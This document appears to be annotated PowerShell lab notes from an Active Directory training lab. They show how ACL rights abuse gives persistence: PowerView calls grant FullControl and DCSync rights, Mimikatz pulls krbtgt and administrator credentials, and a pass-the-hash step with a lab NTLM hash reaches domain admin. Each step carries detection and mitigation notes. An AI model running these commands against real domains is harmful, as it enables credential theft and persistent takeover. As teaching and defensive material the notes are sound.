Persistence: ACL Rights Abuse
# Lab notes in PowerShell (not bash): a sequence of commands run across
# several sessions, recorded with the outcome they produced. Each step below
# is annotated with what it changes in the directory and what a defender
# would expect to see from it.

# Step 1: enumerate OUs with PowerView to look up distinguished names.
# NOTE(review): the DN used in the later Add-ObjectAcl calls is the domain
# naming context ('DC=dollarcorp,DC=moneycorp,DC=local'), not an OU, so this
# lookup only serves as a reference for the naming format.
Import-module .\powerview.ps1
Get-NetOU

# Step 2: add an ACE granting FullControl on the domain head to student529.
# An ACE like this on the domain object is a long-lived backdoor: it survives
# password resets and is easy to overlook. Defender checks: enable Directory
# Service Changes auditing (Security event 5136 records nTSecurityDescriptor
# modifications) and periodically diff the ACL of the domain naming context
# against a known-good baseline; a non-admin principal with GenericAll here is
# a finding on its own.
# The re-import is redundant if this runs in the same session as step 1.
Import-module .\powerview.ps1
Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName student529 -Rights All -Verbose

# Step 3: add the replication (DCSync) rights for student529. PowerView's
# -Rights DCSync presumably maps to the DS-Replication-Get-Changes family of
# extended rights — confirm against the PowerView source. Only domain
# controllers (and a small, documented set of sync accounts) should hold
# these rights; audit every principal that has them.
Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName student529 -Rights DCSync -Verbose

# Step 4: DCSync from a regular student529 PowerShell session.
# This pulls the credential material of the named account over the
# replication protocol. Detection: replication requests (Security event 4662
# with the replication control-access GUIDs) originating from a host that is
# not a domain controller. Mitigation once detected: the krbtgt secret was
# exposed, so reset krbtgt twice (allowing replication between resets) and
# rotate the other affected accounts.
Import-module invoke-mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
# NOTE(review): 'administator' is spelled differently from the /user value in
# the pth command below; the lookup fails as written.
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\administator"'

# Step 5: with the recovered NTLM hash, start a PowerShell process under the
# administrator's identity (pass-the-hash). Must be run from a local-admin
# PowerShell. The /ntlm value is the lab's own hash. Detection: sekurlsa::pth
# produces a 4624 logon with logon type 9 (NewCredentials) on the source host;
# the resulting remoting session appears on the DC as a network logon for the
# administrator from a workstation. Mitigation: Protected Users / tiered
# admin accounts so that DA credentials never land on workstations.
Import-module invoke-mimikatz
Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:dollarcorp.moneycorp.local /ntlm:a29f7623fd11550def0192de9246f46b /run:powershell.exe"'

# Session transcript: remoting to dcorp-dc from the spawned process confirms
# the DC sees the caller as the domain administrator.
PS C:\Windows\system32> Invoke-Command -Computer dcorp-dc -ScriptBlock{whoami}
dcorp\administrator
